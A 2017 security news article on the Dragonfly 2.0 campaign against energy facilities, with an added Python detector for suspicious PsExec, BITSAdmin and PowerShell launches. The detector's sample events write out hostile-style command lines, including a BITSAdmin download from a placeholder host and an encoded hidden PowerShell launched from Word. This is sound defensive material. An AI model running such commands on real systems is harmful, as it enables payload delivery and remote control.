September 7, 2017 By Mark Samuels 2 min read

A group of cybercriminals is targeting energy facilities in Europe and North America as part of a fresh wave of cybersecurity attacks that could lead to the disruption or sabotage of operational systems.

Though the group — called “Dragonfly” — has been at work since 2011, it became quiet after its operations were exposed by researchers in 2014. However, a new report by security specialist Symantec suggested the group has been active again since 2015 and has increased its operations through 2017.

The report presented more evidence of the threat facing executives who run critical infrastructure, such as energy facilities. IT managers in these organizations should take note of the risks highlighted by Symantec and look to reduce the threat through security best practices.

What Is Dragonfly?

According to SecurityWeek, the Dragonfly group is also known as Energetic Bear, Crouching Yeti and Iron Liberty. During its two-year lull, the group did not stop operations and instead worked to update its activities, according to Bleeping Computer.

In a blog post detailing its new analysis, Symantec suggested the group now aims to sabotage or gain control of operational systems in energy facilities. The researchers noted a distinct increase in activity through 2017 and suggested Dragonfly launched attacks in the U.S., Turkey and Switzerland. Symantec also detected signs of action outside these nations.

Dissecting Dragonfly’s Techniques

The first activity of the renewed campaign, referred to as “Dragonfly 2.0,” came in the form of a malicious email campaign to the energy sector through December 2015. According to Symantec, Dragonfly 2.0 relies on a range of other attack vectors, including watering hole attacks used to harvest network credentials and Trojanized software.

The attackers often use widely available malware via administration tools such as PowerShell, PsExec and BITSAdmin. Symantec suggested this use of standard malware might be part of a strategy to mask the group’s identity. The attackers typically install backdoors onto a victim’s computer to provide remote access to systems.
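Because the tools named above (PowerShell, PsExec, BITSAdmin) are legitimate administration utilities, blocking them outright is rarely an option; defenders instead look for how they are invoked. The following is an added example, not code from the Symantec report or from this article: a small Python detector run over constructed process-creation events in a simplified key=value layout (the field names `host`, `user`, `image`, `cmdline` and `parent`, the sample hostnames and the sample command lines are all assumptions made for illustration). It flags PsExec launches, BITSAdmin transfers from a web URL, and PowerShell started with an encoded or hidden-window command line or spawned by an Office application. In production the same logic would be fed from Sysmon Event ID 1 or Windows Security event 4688 rather than from inline strings.

```python
import re

# Constructed sample process-creation events (not real telemetry; the
# key=value layout and every hostname, user and command line are assumptions).
SAMPLE_EVENTS = [
    'host=WS01 user=alice image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe report.txt" parent=explorer.exe',
    'host=WS02 user=bob image=C:\\Tools\\PsExec.exe cmdline="PsExec.exe \\\\HMI-ENG01 -s cmd.exe" parent=cmd.exe',
    'host=WS03 user=carol image=C:\\Windows\\System32\\bitsadmin.exe cmdline="bitsadmin /transfer job /download /priority high http://example.invalid/update.bin C:\\Users\\carol\\update.exe" parent=cmd.exe',
    'host=WS04 user=dave image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA..." parent=winword.exe',
    'host=WS05 user=svc_backup image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -File C:\\Scripts\\nightly_backup.ps1" parent=taskeng.exe',
]

# key=value pairs; a value is either a double-quoted string or a run of non-spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Office applications that should practically never spawn a shell interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def parse_event(line):
    """Turn one key=value event line into a dict."""
    return {key: (quoted or unquoted) for key, quoted, unquoted in FIELD_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows path (the part after the last backslash)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names an event triggers (empty list = benign by these rules)."""
    image = basename(event.get("image", ""))
    cmd = event.get("cmdline", "").lower()
    parent = basename(event.get("parent", ""))
    hits = []

    # Rule 1: PsExec, by image name or by its presence on the command line.
    if image in {"psexec.exe", "psexec64.exe"} or "psexec" in cmd:
        hits.append("psexec_remote_exec")

    # Rule 2: BITSAdmin pulling a file from a web URL.
    if image == "bitsadmin.exe" and "/transfer" in cmd and re.search(r"https?://", cmd):
        hits.append("bitsadmin_download")

    # Rule 3: PowerShell with an encoded command or hidden window, or launched by Office.
    if image in {"powershell.exe", "pwsh.exe"}:
        encoded = re.search(r"-e(nc(odedcommand)?)?\b", cmd)
        hidden = "-w hidden" in cmd or "windowstyle hidden" in cmd
        if encoded or hidden:
            hits.append("powershell_obfuscated_or_hidden")
        if parent in OFFICE_PARENTS:
            hits.append("powershell_spawned_by_office")
    return hits


def detect(lines):
    """Run every rule over every event; yield (host, rule, cmdline) triples."""
    findings = []
    for line in lines:
        event = parse_event(line)
        for rule in classify(event):
            findings.append((event.get("host"), rule, event.get("cmdline")))
    return findings


if __name__ == "__main__":
    for host, rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmdline}")
```

The rules are deliberately narrow: a scheduled backup script run by PowerShell (WS05) produces no finding, while the encoded, hidden-window launch from Word (WS04) triggers two. Tuning for a real estate means adding allow-lists for known administrative hosts and jump servers rather than loosening the patterns.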

Researchers suggested the most concerning evidence centers on screen captures. Some of these captures included sensitive details such as the location of the infected machine and the name of the host organization. Many of these descriptions included the string cntrl, which is a potential indication that these machines have operational system access.

Symantec reported the amount of conflicting evidence about Dragonfly activities makes it difficult to state the origins of the group and the individuals involved. However, the firm referred to Dragonfly as a highly experienced threat actor with the capability to materially disrupt utility organizations. The long-term plans of the group remain uncertain.

Protecting the Energy Sector From Cybersecurity Attacks

An increasing number of experts recognize that energy and utilities organizations worldwide are a focus of cybersecurity attacks. The FBI and Department of Homeland Security issued a joint report earlier this year warning about the risk to nuclear power stations and other energy facilities, The New York Times reported.

Last month, the National Infrastructure Advisory Council (NIAC) published a draft report detailing the complex risks associated with critical infrastructure sectors. NIAC made 11 specific recommendations, including the establishment of specific network paths and reserved spectrum for backup communications during emergencies.

News of this ever-increasing threat represents a significant warning signal to executives running utility facilities and other elements of critical infrastructure. The Symantec researchers ended their report with several security recommendations, such as using strong passwords, implementing multiple protection systems and establishing an enforceable security policy with an emphasis on employee education programs.
